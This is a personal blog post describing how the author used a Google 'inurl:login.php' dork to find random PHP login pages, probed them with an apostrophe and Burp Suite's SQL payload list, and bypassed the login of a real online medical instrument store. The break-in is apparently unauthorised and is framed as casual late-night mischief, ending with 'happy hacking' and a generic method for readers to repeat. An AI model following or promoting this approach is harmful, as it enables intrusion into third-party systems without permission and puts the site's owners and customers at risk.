How I found a SQL flaw on an online medical instrument store?
The auspicious day of the release of Avenger’s : Infinity War , I was so excited I couldn’t sleep in the wait of the movie. I was binge watching youtube videos related to Avenger’s, then I got the brilliant idea why not hack something in the mean time. If I am not sleeping why not use the time for something mischevious.
So let’s hack!
I wanted to practise my SQL Injection skills, so I did a google search “inurl:login.php”, the use of ‘inurl’ dork gave me a list of php login pages, php login websites tend to be more vulnerable to SQL injection attacks. After that I opened up a series of the suggested login pages in new tabs and started checking for a SQL vulnerable site.
Identifying the vulnerable site!
The different login pages that were opened in different tabs I opened them one by one (that’s how unoccupied I was), once I opened them up I tried the most basic check for SQL vulnerability by inserting an apostrophe (‘) in the username field and leaving the password field empty and trying to login, after a few attempts this website gave me an SQL error which looked something like this.
Testing with payloads!
Now, once I received this error message, I tried to input different payloads to actually asses how the username verification was working. One after the another I input different payloads in a systematic method, that gave me a more better explanation as to what payload can help me to bypass the login authentication.
Try to carry out the SQL injection, you have to try out the different payload combination, first of all you can try in with the inbuilt list of SQL payloads of BurpSuite to understand how the login behaves, after that check in for the out of the usual message lengths and check the responses you receive for those particular payload. Once you understand what kind of payloads is effecting the login in an unusual form, from there onwards you can carry the manual SQL attack.
So, that’s how I found a way to bypass the login of the online medical store.
If you enjoyed it please do clap and happy hacking!
Twitter : twitter.com/aditya12anand
LinkedIn : linkedin.com/in/aditya12anand/
E-mail : [email protected]